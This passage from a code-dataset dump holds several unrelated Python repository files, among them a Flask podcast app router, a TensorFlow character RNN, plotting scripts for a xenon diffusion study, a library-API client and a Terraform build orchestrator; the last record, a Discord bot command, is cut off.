methods=[\"POST\"])\n@login_required\ndef playtrack(podcastid, episodeid):\n if podcastid == None or episodeid == None:\n return redirect(session[\"history\"].get(-1))\n \n pod = podcast.getPodcastById(podcastid)\n try:\n ep = list(filter(lambda e : e.episodeid == int(episodeid), pod.getAllEpisodes()))[0]\n except:\n return redirect(session[\"history\"].get(-1))\n session['last_played']['pod'] = pod\n session['last_played']['ep'] = ep\n session['last_played']['meta']['is_playing'] = True\n session['last_played']['meta']['current_time'] = 0\n session['last_played']['meta']['tickid'] = 0\n return redirect(session[\"history\"].get(-1))\n\n@app.route('/api/tickupdate', methods=[\"POST\"])\ndef updatetrack():\n is_playing = request.form[\"isPlaying\"] == 'true'\n current_time = request.form[\"currentTime\"]\n tickid = request.form[\"tickid\"]\n playid = request.form[\"playID\"]\n if(is_playing == None or current_time == None):\n return \"ERROR: Data mismatch.\", 500\n if int(tickid) > session['last_played']['meta']['tickid'] and int(playid.split('_')[0]) == session['last_played']['pod'].podcastid and int(playid.split('_')[1]) == session['last_played']['ep'].episodeid:\n session['last_played']['meta'] = {\n 'is_playing': is_playing,\n 'current_time': float(current_time),\n 'tickid': int(tickid)\n }\n return \"Ok.\", 200\n\n@app.route('/api/update/episode', methods=[\"POST\"])\n@login_required\ndef updateepisode():\n podcastid = request.form['update_podcastid']\n episodeid = request.form['update_episodeid']\n title = request.form['update_title']\n description = request.form['update_description']\n pod = podcast.getPodcastById(podcastid)\n if(pod == None):\n return \"ERROR: Data mismatch.\", 500\n if(pod.user_username != current_user.username):\n return 401, \"Unauthorized.\" \n if int(episodeid) not in [e.episodeid for e in pod.getAllEpisodes()]:\n return \"ERROR: Data mismatch.\", 500\n query(\"UPDATE episode SET title = ?, description = ? WHERE podcast_podcastid = ? AND episodeid = ?\", (title, description, podcastid, episodeid,))\n return redirect(session[\"history\"].get(0))\n \n@app.route('/api/update/podcast', methods=[\"POST\"])\n@login_required\ndef updatepodcast():\n podcastid = request.form['update_podcastid']\n title = request.form['update_title']\n description = request.form['update_description']\n pod = podcast.getPodcastById(podcastid)\n if(pod == None):\n return \"ERROR: Data mismatch.\", 500\n if(pod.user_username != current_user.username):\n return 401, \"Unauthorized.\" \n query(\"UPDATE podcast SET title = ?, description = ? WHERE podcastid = ?\", (title, description, podcastid,))\n return redirect(session[\"history\"].get(0))\n\n@app.route('/api/update/comment', methods=[\"POST\"])\n@login_required\ndef updatecomment():\n podcastid = request.form['podcastid']\n episodeid = request.form['episodeid']\n content = request.form['content']\n timestamp = request.form['timestamp']\n if(podcastid == None or episodeid == None or timestamp == None or content == None):\n return \"ERROR: Data mismatch.\", 500\n res = query(\"SELECT * FROM comment WHERE episode_podcast_podcastid = ? AND episode_episodeid = ? AND date_published = ? AND user_username = ?\", (podcastid, episodeid, timestamp, current_user.username, ))\n if(len(res) == 0): \n return \"ERROR: Data mismatch.\", 500\n query(\"UPDATE comment SET content = ? WHERE episode_podcast_podcastid = ? AND episode_episodeid = ? AND date_published = ? 
AND user_username = ?\", (content, podcastid, episodeid, timestamp, current_user.username, ))\n return redirect(session[\"history\"].get(0))\n\n@app.route('/api/remove/podcast', methods=[\"POST\"])\n@login_required\ndef removepodcast():\n podcastid = request.form['podcastid']\n if(podcastid == None):\n return \"ERROR: Data mismatch.\", 500\n pod = podcast.getPodcastById(podcastid)\n if(pod.user_username != current_user.username):\n return 401, \"Unauthorized.\" \n query(\"DELETE FROM podcast WHERE podcastid = ?\", (podcastid,))\n return redirect('/')\n\n@app.route('/api/remove/episode', methods=[\"POST\"])\n@login_required\ndef removeepisode():\n podcastid = request.form['podcastid']\n episodeid = request.form['episodeid']\n pod = podcast.getPodcastById(podcastid)\n if(pod.user_username != current_user.username):\n return 401, \"Unauthorized.\" \n if int(episodeid) not in [e.episodeid for e in pod.getAllEpisodes()]:\n return \"ERROR: Data mismatch.\", 500\n query(\"DELETE FROM episode WHERE podcast_podcastid = ? AND episodeid = ?\", (podcastid,episodeid, ))\n return redirect('/pod/'+podcastid)\n\n@app.route('/api/remove/comment', methods=[\"POST\"])\n@login_required\ndef removecomment():\n podcastid = request.form['podcastid']\n episodeid = request.form['episodeid']\n timestamp = request.form['timestamp']\n if(podcastid == None or episodeid == None or timestamp == None):\n return \"ERROR: Data mismatch.\", 500\n query(\"DELETE FROM comment WHERE episode_podcast_podcastid = ? AND episode_episodeid = ? AND date_published = ? AND user_username = ?\", (podcastid, episodeid, timestamp, current_user.username, ))\n return redirect(session[\"history\"].get(0))\n\n@app.route('/delete/', defaults={'podcastid': ''})\n@app.route('/delete/')\n@login_required\ndef deletepodview(podcastid):\n pod = podcast.getPodcastById(podcastid)\n if(pod == None):\n return \"ERROR: Data mismatch.\", 500\n return render_template(\"delete.html\", pod=pod, ep=None)\n\n@app.route('/delete/', defaults={'podcastid': '', 'episodeid': ''})\n@app.route('/delete//')\n@login_required\ndef deleteepview(podcastid, episodeid):\n pod = podcast.getPodcastById(podcastid)\n if(pod == None):\n return \"ERROR: Data mismatch.\", 500\n if int(episodeid) not in [e.episodeid for e in pod.getAllEpisodes()]:\n return \"ERROR: Data mismatch.\", 500\n ep = list(filter(lambda e : e.episodeid == int(episodeid), pod.getAllEpisodes()))[0]\n return render_template(\"delete.html\", pod=pod, ep=ep)\n\n","repo_name":"xNicklaj/polito_intro_to_web_app","sub_path":"app/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":17438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35397344613","text":"import os, sys, csv\r\n\r\n\r\ndef resource_path(relative_path):\r\n try:\r\n base_path = sys._MEIPASS\r\n except:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path).replace('\\\\', '/')\r\n\r\n\r\ndef read_file(file_name):\r\n content = []\r\n extension = file_name.split('.')[-1]\r\n\r\n try:\r\n with open(resource_path(file_name), 'r', encoding='utf-8') as f:\r\n if extension == 'txt':\r\n content = f.readlines()\r\n elif extension == 'csv':\r\n content = list(csv.DictReader(f, delimiter=','))\r\n except:\r\n print(f'{file_name} not found')\r\n\r\n return content\r\n\r\n\r\ndef write_file(file_name, content):\r\n with open(resource_path(file_name), 'w', encoding='utf-8') as f:\r\n 
f.writelines(\"\\n\".join(content))","repo_name":"sopryshko/kith_bot","sub_path":"sources/file_handling.py","file_name":"file_handling.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21565100991","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib import rnn\nimport pprint\n\npp = pprint.PrettyPrinter(indent=4)\nsess = tf.InteractiveSession()\n\nwith tf.variable_scope('rnn_sample') as scope:\n sentence = (\"if you want to build a ship, don't drum up people together to \"\n \"collect wood and don't assign them tasks and work, but rather \"\n \"teach them to long for the endless immensity of the sea.\")\n char_set = list(set(sentence))\n char2idx = {c: i for i,c in enumerate(char_set)}\n\n dic_size = len(char2idx)\n rnn_hidden_size = len(char2idx)\n num_classes = len(char2idx)\n sequence_len = 10\n\n dataX = []\n dataY = []\n for i in range(0, len(sentence) - sequence_len):\n x_str = sentence[i:i+sequence_len]\n y_str = sentence[i + 1: i + sequence_len + 1]\n # print(i, x_str, '->', y_str)\n\n x = [char2idx[c] for c in x_str]\n y = [char2idx[c] for c in y_str]\n\n dataX.append(x)\n dataY.append(y)\n\n batch_size = len(dataX)\n\n\n\n X = tf.placeholder(tf.int32, [None, sequence_len])\n Y = tf.placeholder(tf.int32, [None, sequence_len])\n#\n X_one_hot = tf.one_hot(X, num_classes)\n print(X_one_hot)\n\n cell = tf.contrib.rnn.BasicLSTMCell(num_units=rnn_hidden_size, state_is_tuple=True)\n cell = rnn.MultiRNNCell([cell] * 2, state_is_tuple=True)\n\n# initial_state = cell.zero_state(batch_size, tf.float32)\n outputs, _states = tf.nn.dynamic_rnn(cell, X_one_hot, dtype=tf.float32)\n X_for_softmax = tf.reshape(outputs, [-1, rnn_hidden_size])\n\n softmax_w = tf.get_variable(\"softmax_w\", [rnn_hidden_size, num_classes])\n softmax_b = tf.get_variable(\"softmax_b\", [num_classes])\n\n outputs = tf.matmul(X_for_softmax, softmax_w) + softmax_b\n\n outputs = tf.reshape(outputs, [batch_size, sequence_len, num_classes])\n\n weights = tf.ones([batch_size, sequence_len])\n sequence_loss = tf.contrib.seq2seq.sequence_loss(logits=outputs, targets=Y, weights=weights)\n loss = tf.reduce_mean(sequence_loss)\n # train = tf.train.GradientDescentOptimizer(learning_rate = 0.1).minimize(loss)\n train = tf.train.AdamOptimizer(learning_rate = 0.1).minimize(loss)\n#\n# prediction = tf.argmax(outputs, axis=2)\n#\n#\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(500):\n _, l, results = sess.run([train, loss, outputs], feed_dict={X: dataX, Y: dataY})\n for j, result in enumerate(results):\n index = np.argmax(result, axis=1)\n print(i, j, ''.join([char_set[c] for c in index]), l)\n # result = sess.run(prediction, feed_dict={X: x_data})\n# result_str = [idx2char[c] for c in np.squeeze(result)]\n# print(i, \"loss: \", l, \"Prediction: \", ''.join(result_str))\n\n results = sess.run(outputs, feed_dict={X: dataX})\n for j, result in enumerate(results):\n index = np.argmax(result, axis=1)\n if j is 0:\n print(''.join([char_set[t] for t in index]), end='')\n else:\n print(char_set[index[-1]], end='')\n\n","repo_name":"xiang578/machine-learning","sub_path":"tftest/rnn-long-char.py","file_name":"rnn-long-char.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"11845611821","text":"def is_valid_string(s):\n\n freq_table = {} # Create a frequency table\n for 
char in s:\n\n        freq_table[char] = freq_table.get(char, 0) + 1 # All repeated characters incremented by 1 and stored in the dictionary as values.\n    \n\n    frequencies = list(freq_table.values()) # Count the frequency of each character\n    # print(frequencies)\n    max_freq = max(frequencies) # Finding the most frequent characters\n    min_freq = min(frequencies) # Finding the least frequent characters\n    \n    if max_freq == min_freq: # Checking All characters have the same frequency\n        return "YES"\n    elif (frequencies.count(min_freq)) > (frequencies.count(max_freq)): # Checking the string after removal of one extra character \n        return "YES"\n    else:\n        return "NO"\n    \nuser_input = input('Enter any string: ')\nprint(is_valid_string(user_input))\n\n","repo_name":"JPrakashKumar/Placement-Assignment_-Prakash-Kumar-Jha-","sub_path":"Question-02_Python.py","file_name":"Question-02_Python.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"30069554651","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport xenodiffusionscope\n\ndef nest_diff_trans_model(field): #cm2/s\n    ans = (37.368 * np.power(field, .093452) * \n           np.exp(-8.1651e-5 * field))\n    return ans\n\ndef plot_transv_diff_literature():\n    data = pd.read_csv('Data/diff_studies/diffT_literature.csv', \n                       sep=';', skipinitialspace =True)\n\n    data['D_err_up'] = np.where(data['D_plus'] > 0, \n                                data['D_plus'] - data['D'], 0)\n    data['D_err_down'] = np.where(data['D_minus'] > 0, \n                                  data['D'] - data['D_minus'], 0)\n\n    fig, ax = plt.subplots(1,1,figsize = (4.5,3))\n\n    mask_exo = data['drift_field'] < 600\n    ax.errorbar(data[mask_exo]['drift_field'], data[mask_exo]['D'], \n                yerr=(data[mask_exo]['D_err_down'], \n                      data[mask_exo]['D_err_up']),\n                label = 'EXO-200', marker = 'o', capsize = 4, \n                ls = '')\n    ax.errorbar(data[~mask_exo]['drift_field'], data[~mask_exo]['D'], \n                yerr=(data[~mask_exo]['D_err_down'], \n                      data[~mask_exo]['D_err_up']),\n                label = 'Doke & Aprille', marker = 'o', capsize = 4, \n                ls = '')\n    \n    _fields = np.linspace(5,10000,500)\n    _nest_model = nest_diff_trans_model(_fields)\n    ax.plot(_fields, _nest_model, marker = '', \n            ls = '-', label = 'NEST v2.3.12')\n\n    ax.set_xlabel('Drift Field [V/cm]')\n    ax.set_ylabel('Transverse Diffusion Constant [cm$^2$/s]')\n    ax.set_xscale('log')\n    ax.set_xlim(5,1e4)\n    ax.legend()\n    fig.savefig('Figures/D_transverse_literature.pdf')\n    \n\n\ndef plot_lamp_pulse():\n    lamp = xenodiffusionscope.XeLamp(1)\n    fig, ax = plt.subplots(1,1,figsize = (3.5,3))\n    _t = np.linspace(0,6,100)\n    _pulse = lamp.pulse_lamp(_t)\n    ax.plot(_t, _pulse/max(_pulse))\n    ax.set_ylabel('Relative intensity')\n    ax.set_xlabel('t [$\\\\mu$s]')\n    fig.savefig('Figures/lamp_pulse.pdf')\n\ndef plot_init_pos():\n    lamp = xenodiffusionscope.XeLamp(1)\n    population = lamp.emitted_electrons_in_interval(0,6)\n    x0,y0,z0 = lamp.init_positions(population)\n    fig, ax = plt.subplots(1,1,figsize=(3.5,3))\n    hh = ax.hist2d(x0,y0, bins = 200, cmin = 1, cmap = coolwarm)\n    ax.set_aspect('equal')\n    ax.set_ylim(-3,3)\n    ax.set_xlim(-3,3)\n    ax.set_xlabel('x [mm]')\n    ax.set_ylabel('y [mm]')\n    fig.colorbar(hh[3],label= 'Number of initial electrons')\n    fig.savefig('Figures/init_positions.png')\n\n\nif __name__ == '__main__':\n    # Load my style ;)\n\n    plt.style.use('../thesis_style.mplstyle')\n\n    #the lovely coolwarm colormap :)\n\n    from matplotlib.colors import ListedColormap\n\n    cm = plt.cm.get_cmap('coolwarm')\n\n    # Get the colormap colors, multiply 
them with the factor \"a\", and create new colormap\n a = 0.85\n coolwarm = plt.cm.coolwarm(np.arange(plt.cm.coolwarm.N))\n coolwarm[:,0:3] *= a \n coolwarm = ListedColormap(coolwarm)\n\n summer = plt.cm.summer(np.arange(plt.cm.summer.N))\n summer[:,0:3] *= a \n summer = ListedColormap(summer)\n \n ### Plots\n #plot_transv_diff_literature()\n plot_lamp_pulse()\n plot_init_pos()\n","repo_name":"ricmperes/thesis_plots","sub_path":"Xenoscope/diff_study_plots.py","file_name":"diff_study_plots.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32493293145","text":"import os\n\nimport matplotlib.pyplot as plt\nfrom osgeo import gdal\nimport numpy\nimport pygeoprocessing\n\nCUR_DIR = os.path.dirname(__file__)\nDATA_DIR = os.path.join(CUR_DIR, '..', '..', 'docker', 'data')\n\n\ndef render(filepath, title, out_filename):\n ds = gdal.Open(filepath)\n band = ds.GetRasterBand(1)\n array = band.ReadAsArray()\n array.astype(numpy.float32)\n nodata = band.GetNoDataValue()\n\n ma_array = numpy.ma.masked_array(array, mask=array==nodata)\n plt.clf() # clear figure\n\n plt.xticks(size='small')\n plt.yticks(size='small')\n\n plt.title(title)\n plt.imshow(ma_array, origin='upper', interpolation='none')\n #plt.imshow(ma_array[100:350, 100:350], origin=(100,100),\n # extent=(100, 350, 100, 350))\n plt.legend(loc='lower right', bbox_to_anchor=(0.55, -.75),\n fontsize='small')\n\n if os.path.exists(out_filename):\n os.remove(out_filename)\n\n plt.savefig(out_filename, dpi=75, bbox_inches='tight')\n\nif __name__ == '__main__':\n unproj_dem = os.path.join(DATA_DIR, 'ASTGTM2_N37W120_dem.tif')\n render(unproj_dem,\n 'ASTER N37W120 (unprojected)',\n 'ASTER-N37W120-unprojected.png')\n\n render(os.path.join(DATA_DIR, 'N37W120.tif'),\n 'ASTER N37W120 (UTM zone 11N)',\n 'ASTER-N37W120-UTM11N.png')\n\n alaska_srs = \"\"\"PROJCS[\"WGS 84 / North Pole LAEA Alaska\",\n GEOGCS[\"WGS 84\",\n DATUM[\"WGS_1984\",\n SPHEROID[\"WGS 84\",6378137,298.257223563,\n AUTHORITY[\"EPSG\",\"7030\"]],\n AUTHORITY[\"EPSG\",\"6326\"]],\n PRIMEM[\"Greenwich\",0,\n AUTHORITY[\"EPSG\",\"8901\"]],\n UNIT[\"degree\",0.01745329251994328,\n AUTHORITY[\"EPSG\",\"9122\"]],\n AUTHORITY[\"EPSG\",\"4326\"]],\n UNIT[\"metre\",1,\n AUTHORITY[\"EPSG\",\"9001\"]],\n PROJECTION[\"Lambert_Azimuthal_Equal_Area\"],\n PARAMETER[\"latitude_of_center\",90],\n PARAMETER[\"longitude_of_center\",-150],\n PARAMETER[\"false_easting\",0],\n PARAMETER[\"false_northing\",0],\n AUTHORITY[\"EPSG\",\"3572\"],\n AXIS[\"X\",UNKNOWN],\n AXIS[\"Y\",UNKNOWN]]\"\"\"\n\n out_filename = 'ASTER_alaska.tif'\n pygeoprocessing.reproject_dataset_uri(\n original_dataset_uri=unproj_dem,\n pixel_spacing=30,\n output_wkt=alaska_srs,\n resampling_method='nearest',\n output_uri=out_filename)\n render(out_filename,\n 'ASTER N37W120 (North Pole LAEA Alaska)',\n 'ASTER-N37W120-northpole.png')\n","repo_name":"geohackweek/raster","sub_path":"_episodes/01-introduction/projection_demos.py","file_name":"projection_demos.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"19"} +{"seq_id":"74078334122","text":"import os\nfrom keras.models import load_model, save_model\nimport sys\n\npath = \"../models\"\ndef convert(filename):\n x = filename\n model = load_model(x)\n model_cfg = model.get_config()\n if(x.startswith(\"ffnn\")):\n for i in range(2):\n model_cfg['layers'][i]['config']['batch_input_shape'] = (1,15)\n 
new_model = model.__class__.from_config(model_cfg)\n        new_model.set_weights(model.get_weights())\n        save_model(new_model, path+"/converted/"+x[:-29]+"pr_"+x[-29:])\n    if(x.startswith("lstm")):\n        for i in range(2):\n            model_cfg['layers'][i]['config']['batch_input_shape'] = (1,64,15)\n        new_model = model.__class__.from_config(model_cfg)\n        new_model.set_weights(model.get_weights())\n        save_model(new_model, path+"/converted/"+x[:-29]+"pr_"+x[-29:])\n\nif len(sys.argv) > 1:\n    for mdl in sys.argv[1:]:\n        convert(mdl)\nelse:\n    for x in os.listdir(path):\n        if x.endswith(".h5") and ((x.startswith("ffnn_best_h") or x.startswith("lstm_best_h"))):\n            convert(path+"/"+x)\n","repo_name":"kitt10/iot","sub_path":"egs/smartblinds/scripts/batch_size_convertor.py","file_name":"batch_size_convertor.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"29261567492","text":"import json\nfrom urllib import request, parse\nimport datetime\nimport urllib\nauthkey = '158353134f293055e344b66fa68d3649836912a99af53dcd373bf864905e186f'\n\nlibraryValList = ['gender', 'age', 'addCode', 'ddition_symbol', 'kdc', 'dtl_kdc', 'region', 'dtl_region', 'startDt', 'endDt', 'pageSize']\n\ndef url(data=False) :\n    dt_now = datetime.datetime.now()\n    page = 10 # default value\n    abcd = dict()\n\n    url = \"\"\n\n    if type(data) == type(abcd) :\n        for key, val in data.items():\n            if key in libraryValList :\n                url+=\"&\"+key+\"=\"+val\n        if 'startDt' not in data:\n            url += \"&\" + 'startDate' + \"=\" + str(dt_now.year)+\"-01-01\"\n        if 'pageSize' not in data:\n            url += \"&\" + 'pageSize' + \"=\" + str(page)\n    else :\n        url += \"&\" + 'startDate' + \"=\" + str(dt_now.year) + \"-01-01\"\n        url += \"&\" + 'pageSize' + \"=\" + str(page)\n    return url\n\ndef bestSeller(url):\n    main = \"http://data4library.kr/api/loanItemSrch?authKey=\"+authkey+\"&format=json\"\n    req = request.Request(main+url)\n    res = request.urlopen(req)\n    res = res.read().decode('utf-8')\n    response_json = json.loads(res)\n    return response_json\n\ndef bookSearch(isbn) :\n    main = \"http://data4library.kr/api/srchDtlList?authKey=\"+ authkey + \"&format=json\"+\"&isbn13=\" + str(isbn)\n    print(main)\n    req = request.Request(main)\n    res = request.urlopen(req)\n    res = res.read().decode('utf-8')\n    response_json = json.loads(res)\n    return response_json\n\ndef bookSearchList(url, keyword) :\n    main = \"http://data4library.kr/api/srchBooks?authKey=\"+ authkey + \"&format=json\"+\"&keyword=\"+urllib.parse.quote(keyword)\n    mainUrl = main+url\n    req = request.Request(mainUrl)\n    res = request.urlopen(req)\n    res = res.read().decode('utf-8')\n    response_json = json.loads(res)\n    return response_json\ndef bookInLibrary(isbn, pageSize=10, region=11):\n    main = \"http://data4library.kr/api/libSrchByBook?authKey=\" + authkey + \"&format=json\" + \"&isbn=\" + str(isbn) + \\\n           \"&region=\"+str(region) + \"&pageSize=\"+str(pageSize)\n    req = request.Request(main)\n    res = request.urlopen(req)\n    res = res.read().decode('utf-8')\n    response_json = json.loads(res)\n\n    return response_json","repo_name":"strstrstrstr/booksearch","sub_path":"booksearch/pybo/libraryApi.py","file_name":"libraryApi.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"1496506537","text":"import pickle\n\n\ndef get_batch_nums(directory):\n    \"\"\"\n    This function reads the total number of batches processed for each partition.\n    For example, if 
batch_nums['train'][0] = 10, then Colab has processed\n batches [0, 10) for the train1 partition of the dataset.\n\n :param directory: the directory which holds all of the data from Colab\n :return: a dictionary with the number batches processed by Colab\n \"\"\"\n batch_nums = {'train': []}\n partition = 'train'\n for i in range(1, 4):\n with open(f'{directory}/{partition}{i}_startup.pkl', mode='rb') as file:\n _, batch_num = pickle.load(file)\n batch_nums[partition].append(batch_num)\n for partition in ['validate', 'test']:\n with open(f'{directory}/{partition}_startup.pkl', mode='rb') as file:\n _, batch_nums[partition] = pickle.load(file)\n return batch_nums\n\n\nif __name__ == '__main__':\n print(get_batch_nums('./data'))\n","repo_name":"charles-reinertson/Podcast_Audio_Classification","sub_path":"print_batch_numbers.py","file_name":"print_batch_numbers.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24860200259","text":"#!/usr/bin/env python3\n\n# Orchestrator build script for all environments - to be called by Gitlab or can be used interactively\nimport argparse\nimport sys\nimport os\nimport inspect\nimport hcl2\n\nfrom ruamel.yaml import YAML\n\n# realpath() will make your script run, even if you symlink it :)\nbuild_dir = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))\nif build_dir not in sys.path:\n sys.path.insert(0, build_dir)\n\n# include utils or lib modules from a subfolder\nfor include_dir in [\"buildscripts\", \"variables\", \"main\"]:\n build_subdir = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], include_dir)))\n if build_subdir not in sys.path:\n sys.path.insert(0, build_subdir)\n\nfrom buildscripts.tfmodules import prompt_modules, find_modules\nfrom buildscripts.tfprompts import prompt_account, prompt_tfaction\nfrom buildscripts.tfrun import tfrun\nfrom buildscripts.tfutils import str2bool, is_empty\n\nDEPLOY_YAML_FILE = \"./deploy.yaml\"\nINPUT_ENVS_FILE = \"./variables/_envs.tf\"\nTF_ACTIONS = [\"plan\", \"apply\", \"plan-destroy\", \"apply-destroy\"]\nMODULE_DIRS = [\"main\"]\nMODULES_FOR_SRE_ONLY = [\"./main/containers/ecr-repositories\"]\nEMAIL_SETUP_ONLY = [\"./main/management/email-setup\"]\n\nif os.getenv(\"REGION\", None) is None:\n os.environ[\"REGION\"] = \"eu-west-2\"\nelse:\n REGION = os.getenv('REGION')\n\n\ndef process_arguments():\n \"\"\"\n Parse and process program arguments\n :return: argument parser\n \"\"\"\n parser = argparse.ArgumentParser()\n optional = parser._action_groups.pop()\n required = parser.add_argument_group('Required arguments')\n\n optional.add_argument('-d', '--deploy',\n type=str2bool,\n nargs='?',\n default=False,\n const=False,\n required=False,\n help='Deploy mode using deploy.yaml file')\n\n optional.add_argument('-t', '--tfaction',\n required=False,\n default='',\n help='Terraform action (plan, apply, plan-destroy, or apply-destroy')\n\n optional.add_argument('-a', '--approve',\n type=str2bool,\n nargs='?',\n const=True,\n default=False,\n required=False,\n help='Auto approve?')\n\n optional.add_argument('-w', '--workspace',\n default='',\n required=False,\n help='Env/Workspace')\n\n optional.add_argument('-m', '--modules',\n default='',\n required=False,\n help='List of modules')\n\n optional.add_argument('-k', '--key',\n required=False,\n help='Token key')\n\n optional.add_argument('-b', '--branch',\n 
required=False,\n help='Merge request branch')\n\n optional.add_argument('-p', '--prereq',\n default=False,\n required=False,\n help='Build pre-requisite base modules')\n\n optional.add_argument('-c', '--concurrent',\n type=str2bool,\n nargs='?',\n default=False,\n required=False,\n help='Build modules using multi-threads?')\n\n\n parser._action_groups.append(optional)\n\n return parser.parse_args()\n\n\ndef parse_envs_file(envs_file):\n \"\"\"\n The envs.tf file contains metadata that required to build an\n environment for a specific workspace\n :param envs_file:\n :return: list of workspaces and workspace data dict\n \"\"\"\n with(open(envs_file, 'r')) as env_file:\n env_dict = hcl2.load(env_file)\n workspaces_dict = env_dict['variable'][0]['envs']['default']\n\n # setup the workspace/account to display and prompt user to select one to build\n workspaces = []\n for workspace in workspaces_dict:\n for key, val in workspace.items():\n workspaces.append(key + \"|\" + val['account_id'] + \"|\" + val ['account'])\n return workspaces, workspaces_dict\n\n\ndef setup_build_data(build_workspace, args, mod, workspaces_dict, deploy=False, deploy_action=None):\n\n build_env = workspaces_dict[0][build_workspace]\n\n if not str2bool(args.deploy):\n # auto-approve set to True in non-interactive mode\n auto_approve = True\n else:\n auto_approve = args.approve\n\n if deploy and deploy_action is not None:\n tfaction = deploy_action\n else:\n tfaction = args.tfaction\n\n build_data = {\n \"workspace\": build_workspace,\n \"modules\": mod,\n \"auto_approve\": auto_approve,\n \"deploy\": args.deploy,\n \"tfaction\": tfaction,\n \"environment\": build_env,\n \"bucket_region\": workspaces_dict[0][build_workspace][\"bucket_region\"],\n \"bucket\": workspaces_dict[0][build_workspace][\"bucket\"],\n \"dynamodb\": workspaces_dict[0][build_workspace][\"dynamodb\"],\n \"multi_thread\": args.concurrent\n }\n\n return build_data\n\n\ndef get_deploy_data():\n src = YAML(typ='safe')\n with open(DEPLOY_YAML_FILE) as f:\n deploy_data = src.load(f)\n return deploy_data\n\n\ndef main():\n\n args = process_arguments()\n modules_to_plan = []\n build_data = {}\n print (f\"Parameters passed to orchestrators:---> tfaction: {args.tfaction}, deploy: {args.deploy}, branch {args.branch}, modules: {args.modules}, pre-req: {args.prereq}, concurrent: {args.concurrent}\")\n\n if not str2bool(args.deploy):\n print (\"running in interactive mode\")\n workspaces, workspaces_dict = parse_envs_file(INPUT_ENVS_FILE)\n\n # prompt user to select an account to build\n account_sel = prompt_account(workspaces)\n if account_sel is None:\n print(\"User abort exiting...\")\n exit (1)\n\n # prompt user to select module(s) to build\n build_modules = prompt_modules(find_modules(MODULE_DIRS))\n if build_modules is None:\n print(\"User abort exiting...\")\n exit (1)\n\n # prompt user to choose terraform action\n tfaction = prompt_tfaction(TF_ACTIONS)\n if tfaction is None:\n print(\"User abort exiting...\")\n exit (1)\n\n args.tfaction = tfaction\n\n # setup build data for tfrun.py\n build_workspace = account_sel.split('|')[0]\n\n if build_workspace != \"sre\":\n for module in MODULES_FOR_SRE_ONLY:\n if module in build_modules:\n print(f\"This module is build in SRE account only: {module}\")\n build_modules.remove(module)\n\n # only run ses-setup in these workspaces below\n if build_workspace != \"sre\":\n for module in EMAIL_SETUP_ONLY:\n if module in build_modules:\n print(f\"Email setup module is build in SRE only: {module}\")\n 
build_modules.remove(module)\n\n if len(build_modules) > 0:\n print(\"\\n******* Modules to run: *********\")\n print(\"\\n\".join([m for m in build_modules]))\n print(\"**********************************\")\n build_data = setup_build_data(build_workspace, args, build_modules, workspaces_dict)\n tfrun(build_data)\n\n else:\n # running in non interactive mode using deploy.yaml file\n\n if is_empty(args.tfaction) or is_empty(args.workspace):\n print (\"Arguments ERROR: both TF action and workspace are required in using deploy.yaml\")\n exit(1)\n\n deploy_data = get_deploy_data()\n build_modules = deploy_data[\"workspace\"][0][args.workspace]['modules']\n _, workspaces_dict = parse_envs_file(INPUT_ENVS_FILE)\n\n if args.workspace != \"sre\":\n for module in MODULES_FOR_SRE_ONLY:\n if module in build_modules:\n build_modules.remove(module)\n\n # only run ses-setup in these workspaces below\n if args.workspace != \"sre\":\n for module in EMAIL_SETUP_ONLY:\n if module in build_modules:\n print(f\"Email setup module is build in SRE only: {module}\")\n build_modules.remove(module)\n\n build_data = setup_build_data(args.workspace, args, build_modules, workspaces_dict, True, args.tfaction)\n\n if len(build_modules) > 0:\n print(\"\\n******* Modules to run: *********\")\n print(\"\\n\".join([m for m in build_modules]))\n print(\"**********************************\")\n tfrun(build_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dieple/pyrunner","sub_path":"terraform/aws/pyrunner.py","file_name":"pyrunner.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30037011102","text":"class Solution:\n def divisorSubstrings(self, num: int, k: int) -> int:\n count =0\n new_nums=str(num)\n for i in range(len(new_nums)-k+1):\n window = new_nums[i:i+k]\n if int(window)!=0 :\n if num %int(window)==0:\n count+=1\n return count\n \n ","repo_name":"abeni505/Competitive-Programming","sub_path":"1430-find-the-k-beauty-of-a-number/1430-find-the-k-beauty-of-a-number.py","file_name":"1430-find-the-k-beauty-of-a-number.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72883191084","text":"import discord\nfrom discord.ext import commands\n\n\nstored = 'bologna'\n\n\n@commands.command()\nasync def bologna(ctx, arg='', data=''):\n global stored\n if arg == 'read':\n await ctx.send(f\"Stored data: `{stored}`\")\n elif arg == 'write':\n if data == '':\n await 